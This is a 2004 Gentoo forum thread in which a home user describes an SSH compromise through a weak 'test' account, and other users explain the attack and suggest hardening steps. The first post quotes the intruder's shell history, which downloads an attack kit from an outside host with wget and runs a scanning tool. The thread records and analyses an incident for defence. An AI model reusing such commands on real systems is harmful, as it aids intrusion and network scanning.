Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
i got hacked. what were they up to?
View unanswered posts
View posts from last 24 hours

Goto page 1, 2, 3 ... 16, 17, 18  Next  
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Sun Aug 15, 2004 6:44 pm    Post subject: i got hacked. what were they up to? Reply with quote

Ok, so I seem to have been hacked. I run a gentoo box as my home machine, but to be honest, I don't take nearly as good care of it as I should.. I'm sure I got what I deserved. :)

Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete it's home directory, I noticed that a directory named "1", had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:

Code:

total 893
-rw-r--r--  1 1013 users 166154 Aug  7 02:10 Born2Kill.seen
-rw-------  1 1013 users  17982 Oct  9  2000 COPYING
-rw-r--r--  1 1013 users 122242 Aug  7 02:12 LinkEvents
-rw-------  1 1013 users   2147 Oct  9  2000 Makefile
-rw-------  1 1013 users   3398 Nov  8  2000 README
-rw-------  1 1013 users   1569 Oct  9  2000 TODO
-rw-------  1 1013 users  25722 Nov  8  2000 VERSIONS
-rwx------  1 1013 users    936 Dec 21  2003 checkmech
-rwx------  1 1013 users  20290 Oct  9  2000 configure
-rwx------  1 1013 users 474228 Sep 29  2001 crond
-rw-r--r--  1 1013 users    111 Aug  7 02:00 emech.users
-rw-r--r--  1 1013 users     76 May 27  2003 knopki.seen
-rw-------  1 1013 users  22935 Oct  9  2000 mech.help
-rw-r--r--  1 1013 users   1085 Aug  7 02:00 mech.levels
-rw-------  1 1013 users      6 Aug  3 19:49 mech.pid
-rw-r--r--  1 1013 users    484 Aug  7 02:00 mech.session
-rw-------  1 1013 users   4842 Jul 28 02:29 mech.set
-rw-r--r--  1 1013 users   4862 Jul 28 02:33 mech.setes
drwx------  2 1013 users    304 Nov  8  2000 randfiles
drwx------  2 1013 users   1184 Sep 29  2001 src


I opened the user's .bash_history, and here's what I found:

Code:

w
ls
dir
cd\
hash
cd /bin/ls
ls
mkdir 1
ls
cd 1
passwd
passwd
passwd
ls
w
uname -a
cd /var
ls
cd mail
ls
test
./tets
./test
wget
cd
ls
rm -rf 1
ls
cd /sbin
ls
mkdir 1
wget
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
ls
tar xzvf run.tar
tar xvf run.tar
ls
cd run
ls
./sc 168 32773 25 150
uptime


The creation date of the "1" and "lib" directory is august 3rd, so this happened recently. My question is whether anyone knows what this person was up to? The part I wonder in particular about is the line "./sc <a bunch of numbers>". I went to the URL where they downloaded the program, but it is no longer working. chkrootkit doesn't find anything.

I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously. :)

mod edit: Sticky
amne

edit2: 2006-04-10 unstuck
amne

_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
jjasghar
Guru
Guru


Joined: 07 Mar 2004
Posts: 342
Location: $HOME=/usa/tx/austin

PostPosted: Sun Aug 15, 2004 7:09 pm    Post subject: Reply with quote

that is interesting...

moral of that storie, don't have a username called "test" :wink: :P
_________________
#include <LinuxUser #324070>
main()
{
printf("and i'm sorry my spellign sucs.");
}
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Sun Aug 15, 2004 7:35 pm    Post subject: Reply with quote

Hmm, more web searching seems to reveal that they were attempting (and failing) to install and run an IRC bot. Since I have never gotten into IRC, I have no idea what that is, although I've heard the term many times. :)
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
sirber
n00b
n00b


Joined: 07 Apr 2004
Posts: 37

PostPosted: Sun Aug 15, 2004 7:47 pm    Post subject: Reply with quote

You can surely get his IP and contact his ISP about hacking attempt.
Back to top
View user's profile Send private message
tomchuk
Guru
Guru


Joined: 23 Mar 2003
Posts: 317
Location: Brooklyn, NY

PostPosted: Sun Aug 15, 2004 8:21 pm    Post subject: Reply with quote

The source IP of the attack is just another compromised box, with either guest/guest, test/test, admin/admin, root/root username/password combos running sshd. I've been getting so many of these attempts that I've stopped reporting these compromised boxes. There have been a huge ammount of scans using this new tool since the end of July and there are probably tens of thousands of compromised boxes out there.

The attacker's usual course of events is to login from a compromised box, change the password, download this little "run.tar" kit maybe run an irc bot, and then set the scanning tool to scan an entire class A. Many time's he'll also run a trojaned sshd. He'll usually show up later to collect the results and/or use your box to infiltrate others. The scary part is that whoever is behind this hasn't done anything with these compromised boxen yet, they just seem to be cataloging the results of the scans.
Back to top
View user's profile Send private message
brettlpb
Apprentice
Apprentice


Joined: 27 May 2003
Posts: 197

PostPosted: Sun Aug 15, 2004 10:10 pm    Post subject: Reply with quote

Sorry to de-rail, but what log are you scrolling to see failed ssh logins etc?
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Sun Aug 15, 2004 10:21 pm    Post subject: Reply with quote

/var/log/messages with some serious grep action.
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
Captain_Loser
Tux's lil' helper
Tux's lil' helper


Joined: 19 Mar 2003
Posts: 106

PostPosted: Mon Aug 16, 2004 1:12 am    Post subject: Reply with quote

Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.
_________________
KHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN!!!!!!!
Back to top
View user's profile Send private message
Determined
n00b
n00b


Joined: 29 Dec 2003
Posts: 54

PostPosted: Mon Aug 16, 2004 5:18 am    Post subject: Reply with quote

Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.

The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.
_________________
-Determined

Currently working on;
http://www.familytreelink.com
http://www.davidmonaghan.com
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Mon Aug 16, 2004 5:24 am    Post subject: Reply with quote

Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. :)
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
tumbak
Apprentice
Apprentice


Joined: 10 Jan 2004
Posts: 230
Location: supposedly Palestine

PostPosted: Mon Aug 16, 2004 7:27 am    Post subject: Reply with quote

I noticed a directory called src/ in your output, can you tar it and share it please, or tar the whole ~test :D
_________________
less QQ more pewpew!
Back to top
View user's profile Send private message
JudgeNik
Tux's lil' helper
Tux's lil' helper


Joined: 02 Mar 2004
Posts: 86
Location: Bolzano, Italy

PostPosted: Mon Aug 16, 2004 7:30 am    Post subject: Reply with quote

:x damn.

I've seen a folder called /1/ on my server.

I've been told to emerge chkrootkit.
apparently i've been rooted...

Don't know how my server was setup beginning of last year and it never had any testing accounts on it and no accounts with same/same.
_________________
See the famous Niko Roberts at http://www.nikoroberts.com
Back to top
View user's profile Send private message
drspewfy
Tux's lil' helper
Tux's lil' helper


Joined: 13 Dec 2003
Posts: 125
Location: Mexico

PostPosted: Mon Aug 16, 2004 8:35 am    Post subject: Reply with quote

off course you have been routed,,!!!!

and he installed a Psybnc kinda bot, He uses YOUR ip to connect to the IRc and like that talk with others using your ip, if somebody tries to aatack him he wont get down cuz, hes spoofing your IP.. and you will get down :P

You should use

"lsof" instands of netstat , ps x, etc...

Cuz maybe you have been backdoored..
use the command "find" to see, What files had been modified in that day,
also try to use tripwire, to see what files changed since the intrusion (well that is for the nexts penetrations ;) , besides snort.

good luck!
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Mon Aug 16, 2004 11:44 am    Post subject: Reply with quote

I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
evoweiss
Veteran
Veteran


Joined: 07 Sep 2003
Posts: 1678
Location: Edinburgh, UK

PostPosted: Mon Aug 16, 2004 11:53 am    Post subject: Reply with quote

Hi all,

Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root"). I keep everything up-to-date and, hence, haven't noticed anything amiss. Just a quick tip: There's no need to dig through the log file of everything, just look into the /var/log/sshd/ files to get an indication of that port's activity.

Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

Finally, I always use strong passwords and keep my system updated. I suspect I'm pretty safe :).

Best,

Alex
Back to top
View user's profile Send private message
jpc82
Guru
Guru


Joined: 09 Mar 2003
Posts: 326

PostPosted: Mon Aug 16, 2004 2:07 pm    Post subject: Reply with quote

Wow I am glad I saw this post.

I was just looking at my logs and I see this
Code:

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2



Does this mean that all thier attempts were not successful? I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root" I'm confused since I have ssh to not allow root access, or is this just the regular error for failed root access?


Also, would moving ssh to another post stop these attacks? I'm assuming it would since they would be trying to connect to the wrong port?
Back to top
View user's profile Send private message
grant.mcdorman
Apprentice
Apprentice


Joined: 29 Jan 2003
Posts: 295
Location: Toronto, ON, Canada

PostPosted: Mon Aug 16, 2004 4:21 pm    Post subject: Reply with quote

bcore wrote:
Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. :)
I ssh in from work too, but I've set up the firewall so the ssh port is only open to my work IP - connection attempts from any other IP are dropped. If your work IP is a fixed address, and your firewall supports it (Linux of course does, and some router boxes, e.g. SMC's, do too), you could do this too to get better security. Makes it kinda hard for the 31337 sk1rpt kiddies to try to break in that way.
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Mon Aug 16, 2004 4:54 pm    Post subject: Reply with quote

Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
smonijhay1
Apprentice
Apprentice


Joined: 29 Apr 2004
Posts: 229
Location: Ann Arbor Michigan

PostPosted: Mon Aug 16, 2004 4:58 pm    Post subject: Reply with quote

geez, what an awesome post!

thought I should give my info a look since I saw this post and sure enough there were numerous attempts at trying to connect using random user names.

now I must learn to set up and configure a good firewall (ipchains? iptables?)
_________________
you mean you are going to remember me by what I type....here?
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Mon Aug 16, 2004 5:07 pm    Post subject: Reply with quote

One other thing I have to remark is that looking at the bash_history really shows how inept this person was.. Total script kiddie. I mean cummon.. "cd\"??! The lame failed attempt to read my mail, then install something in "/sbin"?

I definitely don't think I was up against anyone with skill, so if I had been properly prepared I would have had nothning to worry about..
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
tomchuk
Guru
Guru


Joined: 23 Mar 2003
Posts: 317
Location: Brooklyn, NY

PostPosted: Mon Aug 16, 2004 5:32 pm    Post subject: Reply with quote

bcore wrote:
I definitely don't think I was up against anyone with skill.


Well he definately wasn't up against anyone with skill :P Come on, three years with a test user with test as a password - you're in no place to critique anyone's typos :)
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Mon Aug 16, 2004 5:35 pm    Post subject: Reply with quote

Re-read my posts. I fully admitted that I made a mistake, and I said that if I had done my due diligence, I would have been fine.
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
tomchuk
Guru
Guru


Joined: 23 Mar 2003
Posts: 317
Location: Brooklyn, NY

PostPosted: Mon Aug 16, 2004 5:40 pm    Post subject: Reply with quote

I know, it was a joke, notice the 'Razz' and 'Smile' smileys.
Back to top
View user's profile Send private message
GentooBox
Veteran
Veteran


Joined: 22 Jun 2003
Posts: 1168
Location: Denmark

PostPosted: Mon Aug 16, 2004 6:12 pm    Post subject: Reply with quote

I hate ssh worms...

They will never stop.. just like any other worm.
_________________
Encrypt, lock up everything and duct tape the rest
Back to top
View user's profile Send private message
Ox53746F6E65
n00b
n00b


Joined: 17 Feb 2004
Posts: 35

PostPosted: Mon Aug 16, 2004 6:13 pm    Post subject: Reply with quote

use portknocking to make your system more secure.
_________________
Ox is on
Gentoo on VMWare
Sys: Athlon XP 1800+, 1GB Ram, 340 GB HD, Dual Boot Sys with WinXP and GentooR6
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Goto page 1, 2, 3 ... 16, 17, 18  Next
Page 1 of 18

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum